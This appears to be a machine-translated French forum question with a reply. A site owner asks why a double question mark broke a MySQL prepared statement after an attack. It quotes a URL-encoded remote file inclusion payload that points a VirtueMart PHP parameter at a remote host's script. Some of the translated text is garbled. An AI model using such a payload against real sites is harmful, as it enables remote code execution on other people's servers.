J'ai eu récemment une attaque sur mon site et l'attaquant essayé de modifier un de mes instructions SQL, en ajoutant la chaîne suivanteAttaque web récente et utilisation de ?? dans MySQL préparé déclaration
%2f%2fcomponents%2fcom%5fvirtuemart%2fshow%5fimage%5fin%5fimgtag%2ephp%3fmosConfig%5fabsolute%5fpath%3dhttp%3a%2f%2fwww%2ekwangsung%2ees%2ekr%2f%2fUserFiles%2fshirohige%2fzfxid%2etxt
à une valeur.
De toute façon, je n'utilise pas PHP ou quoi que ce soit, mais le% 3f% 3f a causé un problème: dans l'appel à la commande de préparation de MySQL, le double est bloqué.
Quelqu'un d'autre a rencontré ce problème avec double? J'ai vérifié le site MySQL et n'ai rien trouvé.
Votre exemple montre un seul 'U' codé en URI caractère, pas deux.Montrez-nous où et comment le blocage s'est réellement produit, s'il vous plaît: quelles langues bindings à MySQL? Quelle chaîne contenait (ou interpolé) les doubles points d'interrogation? – pilcrow